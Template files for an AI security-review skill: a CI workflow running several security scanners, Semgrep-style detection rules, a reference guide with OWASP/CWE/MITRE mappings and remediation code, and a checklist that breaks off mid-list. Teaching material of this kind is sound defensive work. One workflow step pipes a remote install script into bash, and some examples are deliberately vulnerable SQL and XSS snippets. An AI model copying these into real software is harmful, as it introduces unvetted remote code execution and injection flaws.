# Job 1: Static Application Security Testing (SAST)
sast-scan:
name: SAST Security Scan
runs-on: ubuntu-latest
steps:
- name: Checkout code
uses: actions/checkout@v4
with:
fetch-depth: 0 # Full history for better analysis
- name: Set up Python
uses: actions/setup-python@v5
with:
python-version: '3.11'
- name: Run SAST Scanner
run: |
# Example: Using Semgrep for SAST
mkdir -p ${{ env.REPORT_DIR }}
pip install semgrep
semgrep --config=auto \
--json \
--output ${{ env.REPORT_DIR }}/sast-results.json \
. || true
# Alternative: Bandit for Python projects
# pip install bandit
# bandit -r . -f json -o ${{ env.REPORT_DIR }}/bandit-results.json
- name: Process SAST Results
run: |
# Parse results and fail on critical/high severity
python3 -c "
import json
import sys
with open('${{ env.REPORT_DIR }}/sast-results.json') as f:
results = json.load(f)
critical = len([r for r in results.get('results', []) if r.get('extra', {}).get('severity') == 'ERROR'])
high = len([r for r in results.get('results', []) if r.get('extra', {}).get('severity') == 'WARNING'])
print(f'Critical findings: {critical}')
print(f'High findings: {high}')
if critical > 0:
print('❌ Build failed: Critical security issues found')
sys.exit(1)
elif high > 0:
print('⚠️ Warning: High severity issues found')
# Optionally fail on high severity
# sys.exit(1)
else:
print('✅ No critical security issues found')
"
- name: Upload SAST Results
if: always()
uses: actions/upload-artifact@v4
with:
name: sast-results
path: ${{ env.REPORT_DIR }}/sast-results.json
retention-days: 30
# Job 2: Dependency Vulnerability Scanning
dependency-scan:
name: Dependency Vulnerability Scan
runs-on: ubuntu-latest
steps:
- name: Checkout code
uses: actions/checkout@v4
- name: Set up Python
uses: actions/setup-python@v5
with:
python-version: '3.11'
- name: Scan Python Dependencies
if: hashFiles('requirements.txt') != ''
run: |
mkdir -p ${{ env.REPORT_DIR }}
pip install safety
safety check \
--json \
--output ${{ env.REPORT_DIR }}/safety-results.json \
|| true
- name: Scan Node Dependencies
if: hashFiles('package.json') != ''
run: |
mkdir -p ${{ env.REPORT_DIR }}
npm audit --json > ${{ env.REPORT_DIR }}/npm-audit.json || true
- name: Process Dependency Results
run: |
# Check for critical vulnerabilities
if [ -f "${{ env.REPORT_DIR }}/safety-results.json" ]; then
critical_count=$(python3 -c "import json; data=json.load(open('${{ env.REPORT_DIR }}/safety-results.json')); print(len([v for v in data.get('vulnerabilities', []) if v.get('severity', '').lower() == 'critical']))")
echo "Critical vulnerabilities: $critical_count"
if [ "$critical_count" -gt "0" ]; then
echo "❌ Build failed: Critical vulnerabilities in dependencies"
exit 1
fi
fi
- name: Upload Dependency Scan Results
if: always()
uses: actions/upload-artifact@v4
with:
name: dependency-scan-results
path: ${{ env.REPORT_DIR }}/
retention-days: 30
# Job 3: Secrets Detection
secrets-scan:
name: Secrets Detection
runs-on: ubuntu-latest
steps:
- name: Checkout code
uses: actions/checkout@v4
with:
fetch-depth: 0 # Full history to scan all commits
- name: Run Gitleaks
uses: gitleaks/gitleaks-action@v2
env:
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
GITLEAKS_ENABLE_SUMMARY: true
- name: Alternative - TruffleHog Scan
if: false # Set to true to enable
run: |
pip install truffleHog
trufflehog --json --regex --entropy=True . \
> ${{ env.REPORT_DIR }}/trufflehog-results.json || true
- name: Upload Secrets Scan Results
if: always()
uses: actions/upload-artifact@v4
with:
name: secrets-scan-results
path: ${{ env.REPORT_DIR }}/
retention-days: 30
# Job 4: Container Image Scanning
container-scan:
name: Container Image Security Scan
runs-on: ubuntu-latest
if: hashFiles('Dockerfile') != ''
steps:
- name: Checkout code
uses: actions/checkout@v4
- name: Build Docker Image
run: |
docker build -t app:${{ github.sha }} .
- name: Run Trivy Scanner
uses: aquasecurity/trivy-action@master
with:
image-ref: app:${{ github.sha }}
format: 'sarif'
output: '${{ env.REPORT_DIR }}/trivy-results.sarif'
severity: 'CRITICAL,HIGH'
- name: Upload Trivy Results to GitHub Security
if: always()
uses: github/codeql-action/upload-sarif@v3
with:
sarif_file: '${{ env.REPORT_DIR }}/trivy-results.sarif'
- name: Upload Container Scan Results
if: always()
uses: actions/upload-artifact@v4
with:
name: container-scan-results
path: ${{ env.REPORT_DIR }}/
retention-days: 30
# Job 5: Infrastructure-as-Code Security Scanning
iac-scan:
name: IaC Security Scan
runs-on: ubuntu-latest
if: hashFiles('**/*.tf', '**/*.yaml', '**/*.yml') != ''
steps:
- name: Checkout code
uses: actions/checkout@v4
- name: Run Checkov
run: |
mkdir -p ${{ env.REPORT_DIR }}
pip install checkov
checkov -d . \
--output json \
--output-file ${{ env.REPORT_DIR }}/checkov-results.json \
--quiet \
|| true
- name: Run tfsec (for Terraform)
if: hashFiles('**/*.tf') != ''
run: |
curl -s https://raw.githubusercontent.com/aquasecurity/tfsec/master/scripts/install_linux.sh | bash
tfsec . \
--format json \
--out ${{ env.REPORT_DIR }}/tfsec-results.json \
|| true
- name: Process IaC Results
run: |
# Fail on critical findings
if [ -f "${{ env.REPORT_DIR }}/checkov-results.json" ]; then
critical_count=$(python3 -c "import json; data=json.load(open('${{ env.REPORT_DIR }}/checkov-results.json')); print(data.get('summary', {}).get('failed', 0))")
echo "Failed checks: $critical_count"
if [ "$critical_count" -gt "0" ]; then
echo "⚠️ Warning: IaC security issues found"
# Optionally fail the build
# exit 1
fi
fi
- name: Upload IaC Scan Results
if: always()
uses: actions/upload-artifact@v4
with:
name: iac-scan-results
path: ${{ env.REPORT_DIR }}/
retention-days: 30
# Job 6: Security Report Generation and Notification
security-report:
name: Generate Security Report
runs-on: ubuntu-latest
needs: [sast-scan, dependency-scan, secrets-scan]
if: always()
steps:
- name: Checkout code
uses: actions/checkout@v4
- name: Download All Scan Results
uses: actions/download-artifact@v4
with:
path: all-results/
- name: Generate Consolidated Report
run: |
# Consolidate all security scan results
mkdir -p consolidated-report
cat > consolidated-report/security-summary.md << EOF
# Security Scan Summary
**Scan Date**: $(date -u +"%Y-%m-%d %H:%M:%S UTC")
**Commit**: ${{ github.sha }}
**Branch**: ${{ github.ref_name }}
EOF
cat >> consolidated-report/security-summary.md << 'EOF'
## Scan Results
### SAST Scan
See artifacts: `sast-results`
### Dependency Scan
See artifacts: `dependency-scan-results`
### Secrets Scan
See artifacts: `secrets-scan-results`
### Container Scan
See artifacts: `container-scan-results`
### IaC Scan
See artifacts: `iac-scan-results`
---
For detailed results, download scan artifacts from this workflow run.
EOF
- name: Comment on PR (if applicable)
if: github.event_name == 'pull_request'
uses: actions/github-script@v7
with:
script: |
const fs = require('fs');
const report = fs.readFileSync('consolidated-report/security-summary.md', 'utf8');
github.rest.issues.createComment({
issue_number: context.issue.number,
owner: context.repo.owner,
repo: context.repo.repo,
body: report
});
- name: Upload Consolidated Report
if: always()
uses: actions/upload-artifact@v4
with:
name: consolidated-security-report
path: consolidated-report/
retention-days: 90
# Security Best Practices Demonstrated:
#
# 1. ✅ Minimal permissions (principle of least privilege)
# 2. ✅ Multiple security scan types (defense in depth)
# 3. ✅ Fail-fast on critical findings
# 4. ✅ Secrets detection across full git history
# 5. ✅ Container image scanning before deployment
# 6. ✅ IaC scanning for misconfigurations
# 7. ✅ Artifact retention for compliance audit trail
# 8. ✅ SARIF format for GitHub Security integration
# 9. ✅ Scheduled scans for continuous monitoring
# 10. ✅ PR comments for developer feedback
#
# Compliance Mappings:
# - SOC 2: CC6.1, CC6.6, CC7.2 (Security monitoring and logging)
# - PCI-DSS: 6.2, 6.5 (Secure development practices)
# - NIST: SA-11 (Developer Security Testing)
# - OWASP: Integrated security testing throughout SDLC

View File

@@ -0,0 +1,355 @@
# Security Rule Template
#
# This template demonstrates how to structure security rules/policies.
# Adapt this template to your specific security tool (Semgrep, OPA, etc.)
#
# Rule Structure Best Practices:
# - Clear rule ID and metadata
# - Severity classification
# - Framework mappings (OWASP, CWE)
# - Remediation guidance
# - Example vulnerable and fixed code
rules:
# Example Rule 1: SQL Injection Detection
- id: sql-injection-string-concatenation
metadata:
name: "SQL Injection via String Concatenation"
description: "Detects potential SQL injection vulnerabilities from string concatenation in SQL queries"
severity: "HIGH"
category: "security"
subcategory: "injection"
# Security Framework Mappings
owasp:
- "A03:2021 - Injection"
cwe:
- "CWE-89: SQL Injection"
mitre_attack:
- "T1190: Exploit Public-Facing Application"
# Compliance Standards
compliance:
- "PCI-DSS 6.5.1: Injection flaws"
- "NIST 800-53 SI-10: Information Input Validation"
# Confidence and Impact
confidence: "HIGH"
likelihood: "HIGH"
impact: "HIGH"
# References
references:
- "https://owasp.org/www-community/attacks/SQL_Injection"
- "https://cwe.mitre.org/data/definitions/89.html"
- "https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html"
# Languages this rule applies to
languages:
- python
- javascript
- java
- go
# Detection Pattern (example using Semgrep-style syntax)
pattern-either:
- pattern: |
cursor.execute($SQL + $VAR)
- pattern: |
cursor.execute(f"... {$VAR} ...")
- pattern: |
cursor.execute("..." + $VAR + "...")
# What to report when found
message: |
Potential SQL injection vulnerability detected. SQL query is constructed using
string concatenation or f-strings with user input. This allows attackers to
inject malicious SQL code.
Use parameterized queries instead:
- Python: cursor.execute("SELECT * FROM users WHERE id = ?", (user_id,))
- JavaScript: db.query("SELECT * FROM users WHERE id = $1", [userId])
See: https://owasp.org/www-community/attacks/SQL_Injection
# Suggested fix (auto-fix if supported)
fix: |
Use parameterized queries with placeholders
# Example vulnerable code
examples:
- vulnerable: |
# Vulnerable: String concatenation
user_id = request.GET['id']
query = "SELECT * FROM users WHERE id = " + user_id
cursor.execute(query)
- fixed: |
# Fixed: Parameterized query
user_id = request.GET['id']
query = "SELECT * FROM users WHERE id = ?"
cursor.execute(query, (user_id,))
# Example Rule 2: Hardcoded Secrets Detection
- id: hardcoded-secret-credential
metadata:
name: "Hardcoded Secret or Credential"
description: "Detects hardcoded secrets, API keys, passwords, or tokens in source code"
severity: "CRITICAL"
category: "security"
subcategory: "secrets"
owasp:
- "A07:2021 - Identification and Authentication Failures"
cwe:
- "CWE-798: Use of Hard-coded Credentials"
- "CWE-259: Use of Hard-coded Password"
compliance:
- "PCI-DSS 8.2.1: Use of strong cryptography"
- "SOC 2 CC6.1: Logical access controls"
- "GDPR Article 32: Security of processing"
confidence: "MEDIUM"
likelihood: "HIGH"
impact: "CRITICAL"
references:
- "https://cwe.mitre.org/data/definitions/798.html"
- "https://owasp.org/www-community/vulnerabilities/Use_of_hard-coded_password"
languages:
- python
- javascript
- java
- go
- ruby
pattern-either:
- pattern: |
password = "..."
- pattern: |
api_key = "..."
- pattern: |
secret = "..."
- pattern: |
token = "..."
pattern-not: |
$VAR = ""
message: |
Potential hardcoded secret detected. Hardcoding credentials in source code
is a critical security vulnerability that can lead to unauthorized access
if the code is exposed.
Use environment variables or a secrets management system instead:
- Python: os.environ.get('API_KEY')
- Node.js: process.env.API_KEY
- Secrets Manager: AWS Secrets Manager, HashiCorp Vault, etc.
See: https://cwe.mitre.org/data/definitions/798.html
examples:
- vulnerable: |
# Vulnerable: Hardcoded API key
api_key = "sk-1234567890abcdef"
api.authenticate(api_key)
- fixed: |
# Fixed: Environment variable
import os
api_key = os.environ.get('API_KEY')
if not api_key:
raise ValueError("API_KEY environment variable not set")
api.authenticate(api_key)
# Example Rule 3: XSS via Unsafe HTML Rendering
- id: xss-unsafe-html-rendering
metadata:
name: "Cross-Site Scripting (XSS) via Unsafe HTML"
description: "Detects unsafe HTML rendering that could lead to XSS vulnerabilities"
severity: "HIGH"
category: "security"
subcategory: "xss"
owasp:
- "A03:2021 - Injection"
cwe:
- "CWE-79: Cross-site Scripting (XSS)"
- "CWE-80: Improper Neutralization of Script-Related HTML Tags"
compliance:
- "PCI-DSS 6.5.7: Cross-site scripting"
- "NIST 800-53 SI-10: Information Input Validation"
confidence: "HIGH"
likelihood: "MEDIUM"
impact: "HIGH"
references:
- "https://owasp.org/www-community/attacks/xss/"
- "https://cwe.mitre.org/data/definitions/79.html"
- "https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html"
languages:
- javascript
- typescript
- jsx
- tsx
pattern-either:
- pattern: |
dangerouslySetInnerHTML={{__html: $VAR}}
- pattern: |
innerHTML = $VAR
message: |
Potential XSS vulnerability detected. Setting HTML content directly from
user input without sanitization can allow attackers to inject malicious
JavaScript code.
Use one of these safe alternatives:
- React: Use {userInput} for automatic escaping
- DOMPurify: const clean = DOMPurify.sanitize(dirty);
- Framework-specific sanitizers
See: https://owasp.org/www-community/attacks/xss/
examples:
- vulnerable: |
// Vulnerable: Unsanitized HTML
function UserComment({ comment }) {
return <div dangerouslySetInnerHTML={{__html: comment}} />;
}
- fixed: |
// Fixed: Sanitized with DOMPurify
import DOMPurify from 'dompurify';
function UserComment({ comment }) {
const sanitized = DOMPurify.sanitize(comment);
return <div dangerouslySetInnerHTML={{__html: sanitized}} />;
}
# Example Rule 4: Insecure Cryptography
- id: weak-cryptographic-algorithm
metadata:
name: "Weak Cryptographic Algorithm"
description: "Detects use of weak or deprecated cryptographic algorithms"
severity: "HIGH"
category: "security"
subcategory: "cryptography"
owasp:
- "A02:2021 - Cryptographic Failures"
cwe:
- "CWE-327: Use of a Broken or Risky Cryptographic Algorithm"
- "CWE-326: Inadequate Encryption Strength"
compliance:
- "PCI-DSS 4.1: Use strong cryptography"
- "NIST 800-53 SC-13: Cryptographic Protection"
- "GDPR Article 32: Security of processing"
confidence: "HIGH"
likelihood: "MEDIUM"
impact: "HIGH"
references:
- "https://cwe.mitre.org/data/definitions/327.html"
- "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/"
languages:
- python
- javascript
- java
pattern-either:
- pattern: |
hashlib.md5(...)
- pattern: |
hashlib.sha1(...)
- pattern: |
crypto.createHash('md5')
- pattern: |
crypto.createHash('sha1')
message: |
Weak cryptographic algorithm detected (MD5 or SHA1). These algorithms are
considered cryptographically broken and should not be used for security purposes.
Use strong alternatives:
- For hashing: SHA-256, SHA-384, or SHA-512
- For password hashing: bcrypt, argon2, or PBKDF2
- Python: hashlib.sha256()
- Node.js: crypto.createHash('sha256')
See: https://cwe.mitre.org/data/definitions/327.html
examples:
- vulnerable: |
# Vulnerable: MD5 hash
import hashlib
hash_value = hashlib.md5(data).hexdigest()
- fixed: |
# Fixed: SHA-256 hash
import hashlib
hash_value = hashlib.sha256(data).hexdigest()
# Rule Configuration
configuration:
# Global settings
enabled: true
severity_threshold: "MEDIUM" # Report findings at MEDIUM severity and above
# Performance tuning
max_file_size_kb: 1024
exclude_patterns:
- "test/*"
- "tests/*"
- "node_modules/*"
- "vendor/*"
- "*.min.js"
# False positive reduction
confidence_threshold: "MEDIUM" # Only report findings with MEDIUM confidence or higher
# Rule Metadata Schema
# This section documents the expected structure for rules
metadata_schema:
required:
- id: "Unique identifier for the rule (kebab-case)"
- name: "Human-readable rule name"
- description: "What the rule detects"
- severity: "CRITICAL | HIGH | MEDIUM | LOW | INFO"
- category: "security | best-practice | performance"
optional:
- subcategory: "Specific type (injection, xss, secrets, etc.)"
- owasp: "OWASP Top 10 mappings"
- cwe: "CWE identifier(s)"
- mitre_attack: "MITRE ATT&CK technique(s)"
- compliance: "Compliance standard references"
- confidence: "Detection confidence level"
- likelihood: "Likelihood of exploitation"
- impact: "Potential impact if exploited"
- references: "External documentation links"
# Usage Instructions:
#
# 1. Copy this template when creating new security rules
# 2. Update metadata fields with appropriate framework mappings
# 3. Customize detection patterns for your tool (Semgrep, OPA, etc.)
# 4. Provide clear remediation guidance in the message field
# 5. Include both vulnerable and fixed code examples
# 6. Test rules on real codebases before deployment
#
# Best Practices:
# - Map to multiple frameworks (OWASP, CWE, MITRE ATT&CK)
# - Include compliance standard references
# - Provide actionable remediation guidance
# - Show code examples (vulnerable vs. fixed)
# - Tune confidence levels to reduce false positives
# - Exclude test directories to reduce noise

View File

@@ -0,0 +1,550 @@
# Reference Document Template
This file demonstrates how to structure detailed reference material that Claude loads on-demand.
**When to use this reference**: Include a clear statement about when Claude should consult this document.
For example: "Consult this reference when analyzing Python code for security vulnerabilities and needing detailed remediation patterns."
**Document purpose**: Briefly explain what this reference provides that's not in SKILL.md.
---
## Table of Contents
**For documents >100 lines, always include a table of contents** to help Claude navigate quickly.
- [When to Use References](#when-to-use-references)
- [Document Organization](#document-organization)
- [Detailed Technical Content](#detailed-technical-content)
- [Security Framework Mappings](#security-framework-mappings)
- [OWASP Top 10](#owasp-top-10)
- [CWE Mappings](#cwe-mappings)
- [MITRE ATT&CK](#mitre-attck)
- [Remediation Patterns](#remediation-patterns)
- [Advanced Configuration](#advanced-configuration)
- [Examples and Code Samples](#examples-and-code-samples)
---
## When to Use References
**Move content from SKILL.md to references/** when:
1. **Content exceeds 100 lines** - Keep SKILL.md concise
2. **Framework-specific details** - Detailed OWASP/CWE/MITRE mappings
3. **Advanced user content** - Deep technical details for expert users
4. **Lookup-oriented content** - Rule libraries, configuration matrices, comprehensive lists
5. **Language-specific patterns** - Separate files per language/framework
6. **Historical context** - Old patterns and deprecated approaches
**Keep in SKILL.md**:
- Core workflows (top 3-5 use cases)
- Decision points and branching logic
- Quick start guidance
- Essential security considerations
---
## Document Organization
### Structure for Long Documents
For references >100 lines:
```markdown
# Title
**When to use**: Clear trigger statement
**Purpose**: What this provides
## Table of Contents
- Links to all major sections
## Quick Reference
- Key facts or commands for fast lookup
## Detailed Content
- Comprehensive information organized logically
## Framework Mappings
- OWASP, CWE, MITRE ATT&CK references
## Examples
- Code samples and patterns
```
### Section Naming Conventions
- Use **imperative** or **declarative** headings
- ✅ "Detecting SQL Injection" not "How to detect SQL Injection"
- ✅ "Common Patterns" not "These are common patterns"
- Make headings **searchable** and **specific**
---
## Detailed Technical Content
This section demonstrates the type of detailed content that belongs in references rather than SKILL.md.
### Example: Comprehensive Vulnerability Detection
#### SQL Injection Detection Patterns
**Pattern 1: String Concatenation in Queries**
```python
# Vulnerable pattern
query = "SELECT * FROM users WHERE id = " + user_id
cursor.execute(query)
# Detection criteria:
# - SQL keyword (SELECT, INSERT, UPDATE, DELETE)
# - String concatenation operator (+, f-string)
# - Variable user input (request params, form data)
# Severity: HIGH
# CWE: CWE-89
# OWASP: A03:2021 - Injection
```
**Remediation**:
```python
# Fixed: Parameterized query
query = "SELECT * FROM users WHERE id = ?"
cursor.execute(query, (user_id,))
# OR using ORM
user = User.objects.get(id=user_id)
```
**Pattern 2: Unsafe String Formatting**
```python
# Vulnerable patterns
query = f"SELECT * FROM users WHERE name = '{username}'"
query = "SELECT * FROM users WHERE name = '%s'" % username
query = "SELECT * FROM users WHERE name = '{}'".format(username)
# All three patterns are vulnerable to SQL injection
```
#### Cross-Site Scripting (XSS) Detection
**Pattern 1: Unescaped Output in Templates**
```javascript
// Vulnerable: Direct HTML injection
element.innerHTML = userInput;
document.write(userInput);
// Vulnerable: React dangerouslySetInnerHTML
<div dangerouslySetInnerHTML={{__html: userComment}} />
// Detection criteria:
// - Direct DOM manipulation (innerHTML, document.write)
// - React dangerouslySetInnerHTML with user data
// - Template engines with autoescaping disabled
// Severity: HIGH
// CWE: CWE-79
// OWASP: A03:2021 - Injection
```
**Remediation**:
```javascript
// Fixed: Escaped output
element.textContent = userInput; // Auto-escapes
// Fixed: Sanitization library
import DOMPurify from 'dompurify';
const clean = DOMPurify.sanitize(userComment);
<div dangerouslySetInnerHTML={{__html: clean}} />
```
---
## Security Framework Mappings
This section provides comprehensive security framework mappings for findings.
### OWASP Top 10
Map security findings to OWASP Top 10 (2021) categories:
| Category | Title | Common Vulnerabilities |
|----------|-------|----------------------|
| **A01:2021** | Broken Access Control | Authorization bypass, privilege escalation, IDOR |
| **A02:2021** | Cryptographic Failures | Weak crypto, plaintext storage, insecure TLS |
| **A03:2021** | Injection | SQL injection, XSS, command injection, LDAP injection |
| **A04:2021** | Insecure Design | Missing security controls, threat modeling gaps |
| **A05:2021** | Security Misconfiguration | Default configs, verbose errors, unnecessary features |
| **A06:2021** | Vulnerable Components | Outdated libraries, unpatched dependencies |
| **A07:2021** | Auth & Session Failures | Weak passwords, session fixation, missing MFA |
| **A08:2021** | Software & Data Integrity | Unsigned updates, insecure CI/CD, deserialization |
| **A09:2021** | Logging & Monitoring Failures | Insufficient logging, no alerting, log injection |
| **A10:2021** | SSRF | Server-side request forgery, unvalidated redirects |
**Usage**: When reporting findings, map to primary OWASP category and reference the identifier (e.g., "A03:2021 - Injection").
### CWE Mappings
Map to relevant Common Weakness Enumeration categories for precise vulnerability classification:
#### Injection Vulnerabilities
- **CWE-78**: OS Command Injection
- **CWE-79**: Cross-site Scripting (XSS)
- **CWE-89**: SQL Injection
- **CWE-90**: LDAP Injection
- **CWE-91**: XML Injection
- **CWE-94**: Code Injection
#### Authentication & Authorization
- **CWE-287**: Improper Authentication
- **CWE-288**: Authentication Bypass Using Alternate Path
- **CWE-290**: Authentication Bypass by Spoofing
- **CWE-294**: Authentication Bypass by Capture-replay
- **CWE-306**: Missing Authentication for Critical Function
- **CWE-307**: Improper Restriction of Excessive Authentication Attempts
- **CWE-352**: Cross-Site Request Forgery (CSRF)
#### Cryptographic Issues
- **CWE-256**: Plaintext Storage of Password
- **CWE-259**: Use of Hard-coded Password
- **CWE-261**: Weak Encoding for Password
- **CWE-321**: Use of Hard-coded Cryptographic Key
- **CWE-326**: Inadequate Encryption Strength
- **CWE-327**: Use of Broken or Risky Cryptographic Algorithm
- **CWE-329**: Not Using a Random IV with CBC Mode
- **CWE-798**: Use of Hard-coded Credentials
#### Input Validation
- **CWE-20**: Improper Input Validation
- **CWE-73**: External Control of File Name or Path
- **CWE-434**: Unrestricted Upload of File with Dangerous Type
- **CWE-601**: URL Redirection to Untrusted Site
#### Sensitive Data Exposure
- **CWE-200**: Information Exposure
- **CWE-209**: Information Exposure Through Error Message
- **CWE-312**: Cleartext Storage of Sensitive Information
- **CWE-319**: Cleartext Transmission of Sensitive Information
- **CWE-532**: Information Exposure Through Log Files
**Usage**: Include CWE identifier in all vulnerability reports for standardized classification.
### MITRE ATT&CK
Reference relevant tactics and techniques for threat context:
#### Initial Access (TA0001)
- **T1190**: Exploit Public-Facing Application
- **T1133**: External Remote Services
- **T1078**: Valid Accounts
#### Execution (TA0002)
- **T1059**: Command and Scripting Interpreter
- **T1203**: Exploitation for Client Execution
#### Persistence (TA0003)
- **T1098**: Account Manipulation
- **T1136**: Create Account
- **T1505**: Server Software Component
#### Privilege Escalation (TA0004)
- **T1068**: Exploitation for Privilege Escalation
- **T1548**: Abuse Elevation Control Mechanism
#### Defense Evasion (TA0005)
- **T1027**: Obfuscated Files or Information
- **T1140**: Deobfuscate/Decode Files or Information
- **T1562**: Impair Defenses
#### Credential Access (TA0006)
- **T1110**: Brute Force
- **T1555**: Credentials from Password Stores
- **T1552**: Unsecured Credentials
#### Discovery (TA0007)
- **T1083**: File and Directory Discovery
- **T1046**: Network Service Scanning
#### Collection (TA0009)
- **T1005**: Data from Local System
- **T1114**: Email Collection
#### Exfiltration (TA0010)
- **T1041**: Exfiltration Over C2 Channel
- **T1567**: Exfiltration Over Web Service
**Usage**: When identifying vulnerabilities, consider which ATT&CK techniques an attacker could use to exploit them.
---
## Remediation Patterns
This section provides specific remediation guidance for common vulnerability types.
### SQL Injection Remediation
**Step 1: Identify vulnerable queries**
- Search for string concatenation in SQL queries
- Check for f-strings or format() with SQL keywords
- Review all database interaction code
**Step 2: Apply parameterized queries**
```python
# Python with sqlite3
cursor.execute("SELECT * FROM users WHERE id = ?", (user_id,))
# Python with psycopg2 (PostgreSQL)
cursor.execute("SELECT * FROM users WHERE id = %s", (user_id,))
# Python with SQLAlchemy (ORM)
from sqlalchemy import text
result = session.execute(text("SELECT * FROM users WHERE id = :id"), {"id": user_id})
```
**Step 3: Validate and sanitize input** (defense in depth)
```python
import re
# Validate input format
if not re.match(r'^\d+$', user_id):
raise ValueError("Invalid user ID format")
# Use ORM query builders
user = User.query.filter_by(id=user_id).first()
```
**Step 4: Implement least privilege**
- Database user should have minimum required permissions
- Use read-only accounts for SELECT operations
- Never use admin/root accounts for application queries
### XSS Remediation
**Step 1: Enable auto-escaping**
- Most modern frameworks escape by default
- Ensure auto-escaping is not disabled
**Step 2: Use framework-specific safe methods**
```javascript
// React: Use JSX (auto-escapes)
<div>{userInput}</div>
// Vue: Use template syntax (auto-escapes)
<div>{{ userInput }}</div>
// Angular: Use property binding (auto-escapes)
<div [textContent]="userInput"></div>
```
**Step 3: Sanitize when HTML is required**
```javascript
import DOMPurify from 'dompurify';
// Sanitize HTML content
const clean = DOMPurify.sanitize(userHTML, {
ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'p'],
ALLOWED_ATTR: []
});
```
**Step 4: Content Security Policy (CSP)**
```html
<!-- Prefer sending CSP as an HTTP response header; the equivalent meta tag form: -->
<meta http-equiv="Content-Security-Policy"
      content="default-src 'self'; script-src 'self' 'nonce-{random}'">
```
---
## Advanced Configuration
This section contains detailed configuration options and tuning parameters.
### Example: SAST Tool Configuration
```yaml
# Advanced security scanner configuration
scanner:
# Severity threshold
severity_threshold: MEDIUM
# Rule configuration
rules:
enabled:
- sql-injection
- xss
- hardcoded-secrets
disabled:
- informational-only
# False positive reduction
confidence_threshold: HIGH
exclude_patterns:
- "*/test/*"
- "*/tests/*"
- "*/node_modules/*"
- "*.test.js"
- "*.spec.ts"
# Performance tuning
max_file_size_kb: 2048
timeout_seconds: 300
parallel_jobs: 4
# Output configuration
output_format: json
include_code_snippets: true
max_snippet_lines: 10
```
---
## Examples and Code Samples
This section provides comprehensive code examples for various scenarios.
### Example 1: Secure API Authentication
```python
# Secure API key handling
import os
from functools import wraps
from flask import Flask, request, jsonify
app = Flask(__name__)
# Load API key from environment (never hardcode)
VALID_API_KEY = os.environ.get('API_KEY')
if not VALID_API_KEY:
raise ValueError("API_KEY environment variable not set")
def require_api_key(f):
@wraps(f)
def decorated_function(*args, **kwargs):
api_key = request.headers.get('X-API-Key')
if not api_key:
return jsonify({'error': 'API key required'}), 401
# Constant-time comparison to prevent timing attacks
import hmac
if not hmac.compare_digest(api_key, VALID_API_KEY):
return jsonify({'error': 'Invalid API key'}), 403
return f(*args, **kwargs)
return decorated_function
@app.route('/api/secure-endpoint')
@require_api_key
def secure_endpoint():
return jsonify({'message': 'Access granted'})
```
### Example 2: Secure Password Hashing
```python
# Secure password storage with bcrypt
import bcrypt
def hash_password(password: str) -> str:
"""Hash a password using bcrypt."""
# Generate salt and hash password
salt = bcrypt.gensalt(rounds=12) # Cost factor: 12 (industry standard)
hashed = bcrypt.hashpw(password.encode('utf-8'), salt)
return hashed.decode('utf-8')
def verify_password(password: str, hashed: str) -> bool:
"""Verify a password against a hash."""
return bcrypt.checkpw(
password.encode('utf-8'),
hashed.encode('utf-8')
)
# Usage
stored_hash = hash_password("user_password")
is_valid = verify_password("user_password", stored_hash) # True
```
### Example 3: Secure File Upload
```python
# Secure file upload with validation
import os
import magic
from werkzeug.utils import secure_filename
ALLOWED_EXTENSIONS = {'pdf', 'png', 'jpg', 'jpeg'}
ALLOWED_MIME_TYPES = {
'application/pdf',
'image/png',
'image/jpeg'
}
MAX_FILE_SIZE = 5 * 1024 * 1024 # 5 MB
def is_allowed_file(filename: str, file_content: bytes) -> bool:
"""Validate file extension and MIME type."""
# Check extension
if '.' not in filename:
return False
ext = filename.rsplit('.', 1)[1].lower()
if ext not in ALLOWED_EXTENSIONS:
return False
# Check MIME type (prevent extension spoofing)
mime = magic.from_buffer(file_content, mime=True)
if mime not in ALLOWED_MIME_TYPES:
return False
return True
def handle_upload(file):
"""Securely handle file upload."""
# Check file size
file.seek(0, os.SEEK_END)
size = file.tell()
file.seek(0)
if size > MAX_FILE_SIZE:
raise ValueError("File too large")
# Read content for validation
content = file.read()
file.seek(0)
# Validate file type
if not is_allowed_file(file.filename, content):
raise ValueError("Invalid file type")
# Sanitize filename
filename = secure_filename(file.filename)
# Generate unique filename to prevent overwrite attacks
import uuid
unique_filename = f"{uuid.uuid4()}_{filename}"
# Save to secure location (outside web root)
upload_path = os.path.join('/secure/uploads', unique_filename)
file.save(upload_path)
return unique_filename
```
---
## Best Practices for Reference Documents
1. **Start with "When to use"** - Help Claude know when to load this reference
2. **Include table of contents** - For documents >100 lines
3. **Use concrete examples** - Code samples with vulnerable and fixed versions
4. **Map to frameworks** - OWASP, CWE, MITRE ATT&CK for context
5. **Provide remediation** - Don't just identify issues, show how to fix them
6. **Organize logically** - Group related content, use clear headings
7. **Keep examples current** - Use modern patterns and current framework versions
8. **Be concise** - Even in references, challenge every sentence

View File

@@ -0,0 +1,253 @@
# Workflow Checklist Template
This template demonstrates workflow patterns for security operations. Copy and adapt these checklists to your specific skill needs.
## Pattern 1: Sequential Workflow Checklist
Use this pattern for operations that must be completed in order, step-by-step.
### Security Assessment Workflow
Progress:
[ ] 1. Identify application entry points and attack surface
[ ] 2. Map authentication and authorization flows
[ ] 3. Identify data flows and sensitive data handling
[ ] 4. Review existing security controls
[ ] 5. Document findings with framework references (OWASP, CWE)
[ ] 6. Prioritize findings by severity (CVSS scores)
[ ] 7. Generate report with remediation recommendations
Work through each step systematically. Check off completed items.
---
## Pattern 2: Conditional Workflow
Use this pattern when the workflow branches based on findings or conditions.
### Vulnerability Remediation Workflow
1. Identify vulnerability type
- If SQL Injection → See [sql-injection-remediation.md](sql-injection-remediation.md)
- If XSS (Cross-Site Scripting) → See [xss-remediation.md](xss-remediation.md)
- If Authentication flaw → See [auth-remediation.md](auth-remediation.md)
- If Authorization flaw → See [authz-remediation.md](authz-remediation.md)
- If Cryptographic issue → See [crypto-remediation.md](crypto-remediation.md)
2. Assess severity using CVSS calculator
- If CVSS >= 9.0 → Priority: Critical (immediate action)
- If CVSS 7.0-8.9 → Priority: High (action within 24h)
